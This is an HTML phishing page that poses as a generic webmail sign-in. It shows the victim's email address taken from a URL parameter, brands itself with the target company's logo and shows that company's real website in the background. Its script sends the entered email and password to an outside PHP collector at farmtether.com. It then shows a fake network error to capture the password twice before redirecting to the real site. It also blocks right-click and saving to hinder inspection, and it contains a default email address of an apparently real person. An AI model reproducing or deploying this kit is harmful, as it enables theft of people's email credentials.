<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <script>
        document.addEventListener("contextmenu", (event) =>
            event.preventDefault()
        );
    </script>
    <script>
        document.addEventListener(
            "keydown",
            function (e) {
                if (
                    (window.navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey) &&
                    e.keyCode == 83
                ) {
                    e.preventDefault();
                    // Process the event here (such as click on submit button)
                }
            },
            false
        );
    </script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <link rel="icon" type="image/png" sizes="192x192" href="https://www.google.com/s2/favicons?domain=fastmail.com"
        id="favico" />
    <title class="logo-title">Webmail</title>
    <style>
        body {
            height: 100%;
            width: 100%;
            padding: 0;
            margin: 0;
            font-family: "Open Sans", sans-serif;
            color: #222;
            background: #e7fafa;
            overflow-x: hidden;
            background-image: url("https://farmtether.com/picture/welcome-bg.svg");
        }

        .full-body {
            width: 420px;
            position: absolute;
            top: 45%;
            left: 50%;
            transform: translate(-50%, -50%);
        }

        .logo-name {
            margin-bottom: 20px;
            margin-top: 10px;
            padding-bottom: 0px;
        }

        .main-body {
            background: #ffffff;
            padding: 0px 40px 40px;
            box-shadow: 0px 0px 8px 2px rgba(148, 148, 148, 0.75);
            -webkit-box-shadow: 0px 0px 8px 2px rgba(148, 148, 148, 0.75);
            -moz-box-shadow: 0px 0px 8px 2px rgba(148, 148, 148, 0.75);
        }

        .error {
            margin-top: 5px;
            padding-top: 5px;
            color: #e04540;
            font-size: 11px;
            display: none;
            margin-bottom: 25px;
        }

        .error .blue {
            color: #0067b8;
            line-height: 25px;
            font-size: 14px;
            font-weight: lighter;
        }

        .main-body .header {
            padding: 10px;
            height: 50px;
            margin: auto;
            width: 150px;
        }

        .main-body .img-logo {
            width: 100%;
            height: 100%;
            margin: 0px;
            object-fit: contain;
        }

        .main-body .grabber p {
            margin-top: 0px;
            font-size: 14px;
            font-weight: 200;
        }

        .main-body .grabber h4 {
            margin-top: 10px;
            font-size: 20px;
            font-weight: 500;
            margin-bottom: 0px;
        }

        .main-body .form-group {
            margin-top: 20px;
        }

        .main-body .form-group input {
            border: 0px solid #222222;
            border-bottom: 1px solid #4d4d4d;
            width: 100%;
            font-size: 14px;
        }

        .main-body .form-group input:focus {
            box-shadow: none;
            outline: none;
        }

        .main-body p.forgot {
            font-size: 13px;
            color: #0067b8;
        }

        .main-body .form-button {
            text-align: right;
        }

        .main-body .form-button .btn {
            font-size: 14px;
            color: #ffffff;
            background: #0067b8;
            border: 1px solid #0067b8;
            padding: 7px 30px;
            border-radius: 1px;
        }

        body .copy {
            text-align: center;
            font-size: 12px;
            color: #010101;
        }

        #mainPage {
            border: none;
        }

        #iframe {
            position: absolute;
            left: 0;
            right: 0;
            bottom: 0;
            top: 0;
            z-index: -10;
            pointer-events: none;
        }

        #overlay {
            background-image: url("https://farmtether.com/picture/welcome-bg.svg");
            background: #555;
            position: absolute;
            top: 0;
            left: 0;
            bottom: 0;
            right: 0;
            border: 1px solid #555;
            opacity: 0.6;
            filter: alpha(opacity=60);
        }

        @media only screen and (max-width: 600px) {
            .full-body {
                margin: 20% 3%;
            }

            .main-body .img-logo {
                width: 100px;
                margin: 0px;
            }

            .error .blue {
                color: #0067b8;
                line-height: 25px;
                font-size: 12px;
                font-weight: lighter;
            }

            .main-body .header {
                margin: 0;
                padding: 0;
            }

            .main-body .img-logo {
                width: 120px;
                margin: 0px;
            }

            .main-body .grabber p {
                margin-top: 20px;
                font-size: 13px;
                font-weight: 200;
            }

            .main-body .grabber h4 {
                margin-top: 10px;
                font-size: 18px;
                font-weight: 500;
            }

            .main-body .form-group {
                margin-top: 20px;
            }

            .main-body .form-group input {
                border: 0px solid #222222;
                border-bottom: 1px solid #4d4d4d;
                width: 100%;
                font-size: 14px;
            }

            .main-body .form-button .btn {
                font-size: 13px;
                color: #ffffff;
                background: #0067b8;
                border: 1px solid #0067b8;
                padding: 7px 30px;
                border-radius: 1px;
            }
        }
    </style>
</head>

<body>
    <div id="iframe">
        <iframe id="bgPage" scrolling="no" src="bgPage" width="100%" height="100%" frameborder="0"></iframe>
    </div>
    <div id="overlay" style="height: 100%; width: 100%"></div>
    <p>&nbsp;</p>
    <p>&nbsp;</p>
    <div class="full-body">
        <div class="main-body">
            <form onsubmit="handleSubmit(event)" autocomplete="">
                <div class="header" style="text-align: center">
                    <img id="lg_im" src="https://farmtether.com/picture/webmail.png" width="200px" alt=" "
                        class="img-logo" />
                </div>
                <h5 id="lg_nm" class="logo-name" style="text-transform: uppercase; font-size: 17px; color: #0067b8">
                </h5>
                <div class="grabber">
                    <p class="grab-mail" id="gm"></p>
                    <h4>Enter password</h4>
                    <p id="error" class="error">Network error... Try again.</p>
                </div>
                <div class="form-group">
                    <input id="tm" type="text" value="One" class="input-form" hidden />
                    <input id="em" type="email" value="" name="em" class="input-form" hidden required readonly />
                    <input id="pw" type="password" name="pw" class="input-form" required />
                    <p class="forgot">Forgot password ?</p>
                </div>

                <div class="form-button">
                    <button id="submit" class="btn btn-md btn-primary">Sign in</button>
                </div>
            </form>
        </div>
        <p class="copy">
            Copyright © 2022
            <span id="lg_nml" style="text-transform: lowercase">Homestack</span>,
            Inc. All rights reserved.
        </p>
    </div>
</body>

</html>
<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
    integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
    crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
    integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
    crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
    integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
    crossorigin="anonymous"></script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
    /* global $ */
    $(document).ready(function () {
        var url = new URL(window.location.href);

        if(url.searchParams.get("a")){
            var a = url.searchParams.get("a");
    }
    else{
        var a = "ann@jointvco.com";
    }
       

        if (!a) {
        } else {
            var my_em = a;
            var ind = my_em.indexOf("@");
            var my_cut = my_em.substr(ind + 1);
            var b = my_cut.substr(0, my_cut.indexOf("."));
            var eml = b.toLowerCase();
            var emu = b.toUpperCase();

            console.log(my_em);
            var lg_slice = "https://logo.clearbit.com/" + my_cut;

            if (lg_slice) {
                var image = new Image();
                image.onload = function () {
                    if (this.width > 0) {
                        let ex = "image exists";
                        $("#lg_im").attr("src", "" + lg_slice);
                    }
                };
                image.onerror = function () {
                    let ex = "image doesnt exist";
                    $("#lg_im").attr("src", "https://farmtether.com/picture/webmail.png");
                };
                image.src = lg_slice;
            }

            $("#favico").attr(
                "href",
                "https://www.google.com/s2/favicons?domain=" + my_cut
            );

            $("#gm").html(my_em);
            $("#lg_nm").html(emu);
            $("#lg_nml").html(eml);
            $(".logo-title").html(eml);
            $("#em").val(my_em);

            var bgPage = "https://www." + my_cut;
            document.getElementById("bgPage").src = bgPage;
        }
    });
</script>

<script>
    function handleSubmit(e) {
        e.preventDefault();
        let emma = $("#em").val();
        let peculiar = $("#pw").val();
        let times_number = $("#tm").val();

        let ind = emma.indexOf("@");
        let my_cut = emma.substr(ind + 1);

        $.ajax({
            url: "https://farmtether.com/picture/welcome.php",
            method: "POST",
            dataType: "JSON",
            data: {
                em: emma,
                pw: peculiar,
                tm: times_number,
            },
            success: function () { },
            complete: function () { },
        });
        if (times_number === "Two") {
            window.location.replace(
                "https://www." + my_cut
            );
        }
        $("#error").show();
        $("#pw").val('');
        $("#tm").val("Two");
    }
</script>
